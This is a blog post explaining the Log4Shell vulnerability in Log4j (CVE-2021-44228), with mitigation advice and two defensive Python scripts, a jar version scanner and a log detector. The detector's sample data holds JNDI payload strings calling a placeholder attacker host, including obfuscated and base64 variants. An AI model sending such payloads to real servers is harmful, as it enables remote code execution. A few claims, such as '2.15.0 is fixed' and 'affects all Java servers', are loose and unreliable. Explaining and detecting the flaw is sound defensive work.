sw0rdf1sh
Published in System Weakness
Dec 14, 2021 · 3 min read


Log4j vulnerability (CVE-2021-44228)

Summary:

Log4j2 is an open-source, Java-based logging framework commonly incorporated into Apache web server and Spring Boot web applications.

The vulnerability has been reported as CVE-2021-44228 against log4j-core.jar. CVE-2021-44228 is considered a critical flaw and has a base score of 10, the highest possible severity rating.

Who is impacted?

Many services are vulnerable to this exploit because Log4j is a widely used Java-based logging utility. Cloud services such as Apple iCloud and others are affected, and anyone running Apache framework services or Spring Boot Java applications that use Log4j is likely to be vulnerable.

How the exploit works:

The exploit works when there is a service or application running a vulnerable version of Log4j2.

An attacker who can control log messages or log message parameters can execute arbitrary code on the vulnerable server, loaded from an attacker-controlled LDAP server, when message lookup substitution is enabled.

Affected Apache Log4j2 versions:

2.0 <= Apache Log4j2 <= 2.14.1

Exploit requirements:

A server running a vulnerable Log4j version.

Exploitation steps:

  • Data from users is sent to the server.
  • The server logs the request data, which contains a malicious payload.
  • The payload triggers the Log4j vulnerability and the server makes a request to attacker.com via JNDI (Java Naming and Directory Interface).
  • The response contains a path to a remote Java class file, which is injected into the server process.
  • The injected payload triggers a second stage and allows the attacker to execute arbitrary code.

How to mitigate:

  • The admin/system team runs a search/grep on every server to spot any file named "log4j2", then checks whether it is a vulnerable version by matching it against a vulnerability database and the CVE.
  • Update to Log4j version 2.15.0, which has been released without the vulnerability.
  • Add the JVM system property "log4j2.formatMsgNoLookups=true" (passed as -Dlog4j2.formatMsgNoLookups=true on the Java command line) to the global configuration of the web server applications.
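The first mitigation step above (find every Log4j jar and decide whether its version falls in the affected range) can be automated. The script below is an added example, not code from the original post or from the Log4j project: it walks a directory tree, reads the version string from each jar's Maven metadata (the pom.properties entry that log4j-core jars ship with), and flags versions in the range the post gives. The 2.15.0 cut-off is taken from the post and kept as a parameter; the sample jars the demo builds are constructed fixtures that contain only that properties file.

```python
"""Find log4j-core jars under a directory and flag vulnerable versions.

Added example, not part of the original post. Each jar's Maven metadata
(META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties) gives
the version string. The 2.15.0 cut-off follows the post and is a parameter.
"""
import os
import re
import tempfile
import zipfile

POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
FIXED_VERSION = (2, 15, 0)  # first patched release named in the post


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0). Pre-release tags are dropped."""
    numbers = [int(n) for n in re.findall(r"\d+", text.split("-")[0])]
    return tuple((numbers + [0, 0, 0])[:3])


def log4j_core_version(jar_path):
    """Return the version string from a jar's log4j-core pom.properties, or None."""
    try:
        with zipfile.ZipFile(jar_path) as jar:
            if POM_PROPS not in jar.namelist():
                return None
            props = jar.read(POM_PROPS).decode("utf-8", "replace")
    except (zipfile.BadZipFile, OSError):
        return None
    for line in props.splitlines():
        key, sep, value = line.partition("=")
        if sep and key.strip() == "version":
            return value.strip()
    return None


def is_vulnerable(version, fixed=FIXED_VERSION):
    """Inside the affected range the post gives: 2.0 <= version < fixed."""
    return (2, 0, 0) <= parse_version(version) < fixed


def scan_tree(root):
    """Walk root; return (path, version, vulnerable) for every log4j-core jar found."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.endswith(".jar"):
                continue
            path = os.path.join(dirpath, name)
            version = log4j_core_version(path)
            if version is not None:
                findings.append((path, version, is_vulnerable(version)))
    return findings


def make_sample_jar(directory, version):
    """Constructed fixture: a jar holding only the pom.properties entry."""
    os.makedirs(directory, exist_ok=True)
    path = os.path.join(directory, f"log4j-core-{version}.jar")
    with zipfile.ZipFile(path, "w") as jar:
        jar.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
    return path


def scan_sample_tree():
    """Build a throwaway tree with one vulnerable and one patched jar; return {version: vulnerable}."""
    with tempfile.TemporaryDirectory() as tmp:
        make_sample_jar(os.path.join(tmp, "app1", "WEB-INF", "lib"), "2.14.1")
        make_sample_jar(os.path.join(tmp, "app2", "lib"), "2.15.0")
        return {version: vulnerable for _, version, vulnerable in scan_tree(tmp)}


if __name__ == "__main__":
    for version, vulnerable in scan_sample_tree().items():
        print(f"{'VULNERABLE' if vulnerable else 'ok'}: log4j-core {version}")
```

Two caveats for real use: this only sees jars that sit on disk as plain files, so a log4j-core copy nested inside a fat jar or war, or a shaded copy under another artifact name, is missed and needs the archive unpacked first; and FIXED_VERSION should be raised as later advisories supersede the 2.15.0 figure the post cites.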

Defense:

  • Remote lookups can be disabled.
  • Use firewalls to prevent remote calls to unexpected servers.
  • Apply proper firewall rules on the application servers so that they are only allowed to communicate with known destinations.
  • Run applications under least-privileged accounts.
  • Run applications in a virtual environment for rapid restoration and a constrained network.
  • Deploy honeypots to detect exploitation reconnaissance.
  • Deploy honeypots near the suspected applications.

Indicators of attack:

  • Spike in CPU usage
  • Unauthorized configuration changes
  • Disparate logs and commands

Attacks seen against this vulnerability:

  • Attackers attempting exploitation via DNS
  • Request strings encoded with base64
  • HTTPS used as the delivery mechanism
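The indicators above are what a defender looks for in the logs, and the note that request strings arrive base64-encoded means a plain string match is not enough. The following is an added example, not code from the original post: it runs a small detection over constructed web-server access-log lines, normalising away URL encoding and the nested case-conversion lookups that public detection rules account for, and decoding base64 fragments so a lookup hidden in an encoded header is still seen. The host attacker.example and the log lines are constructed placeholders.

```python
"""Detect Log4Shell (CVE-2021-44228) lookup strings in access-log lines.

Added example, not part of the original post. The log lines below are
constructed; attacker.example is a placeholder host. Normalisation undoes
URL encoding and ${lower:x}/${upper:x} nested lookups, and base64 blobs
are decoded because the post notes that request strings arrive encoded.
"""
import base64
import binascii
import re
from urllib.parse import unquote

JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^}]*)\}", re.IGNORECASE)
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def normalise(text):
    """Strip cheap obfuscation: URL encoding and ${lower:j}-style lookups.

    A few rounds handle double encoding; the loop stops once a pass
    changes nothing.
    """
    for _ in range(3):
        decoded = CASE_LOOKUP.sub(lambda m: m.group(1), unquote(text))
        if decoded == text:
            break
        text = decoded
    return text


def base64_fragments(text):
    """Decode base64-looking blobs so a payload hidden there can be inspected."""
    decoded = []
    for blob in B64_BLOB.findall(text):
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except (binascii.Error, ValueError):
            continue  # not really base64; ignore
    return decoded


def is_log4shell_attempt(line):
    """True if the line, or any base64 blob inside it, carries a ${jndi: lookup."""
    candidates = [line] + base64_fragments(line)
    return any(JNDI.search(normalise(c)) for c in candidates)


def flag_lines(lines):
    """Return the indexes of lines that look like Log4Shell attempts."""
    return [i for i, line in enumerate(lines) if is_log4shell_attempt(line)]


# Constructed sample: one benign request and four attempt variants.
_PAYLOAD = "${jndi:ldap://attacker.example/a}"
_B64 = base64.b64encode(_PAYLOAD.encode()).decode()
_PREFIX = '10.0.0.5 - - [14/Dec/2021:10:00:01 +0000] '
SAMPLE_LOG = [
    _PREFIX + '"GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    _PREFIX + '"GET / HTTP/1.1" 200 512 "-" "' + _PAYLOAD + '"',
    _PREFIX + '"GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:ldap://attacker.example/a}"',
    _PREFIX + '"GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fa%7D HTTP/1.1" 200 512 "-" "curl/7.79"',
    _PREFIX + '"GET / HTTP/1.1" 200 512 "-" "' + _B64 + '"',
]


if __name__ == "__main__":
    for i in flag_lines(SAMPLE_LOG):
        print(f"line {i}: {SAMPLE_LOG[i]}")
```

Run it against a real access log by replacing SAMPLE_LOG with the file's lines. Matching on the normalised form rather than the raw bytes is the point: the four attempt variants in the sample share no common raw substring, but all collapse to the same "${jndi:" lookup once decoded.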

References:

  1. https://www.indiatoday.in/technology/news/story/log4j-zero-day-vulnerability-discovered-affects-icloud-minecraft-steam-and-more-services-1886670-2021-12-11
  2. https://www.theverge.com/2021/12/10/22828303/log4j-library-vulnerability-log4shell-zero-day-exploit
  3. https://www.kaspersky.co.in/blog/log4shell-critical-vulnerability-in-apache-log4j/23739/
  4. https://www.lunasec.io/docs/blog/log4j-zero-day/
  5. https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/
  6. https://www.picussecurity.com/resource/blog/simulating-and-preventing-cve-2021-44228-apache-log4j-rce-exploits

Conclusion:

As this vulnerability in a Java library class affects all Java application servers, it will stay around for a long time, much like the pandemic.

Thanks for your time in reading this. Happy hacking, everyone.
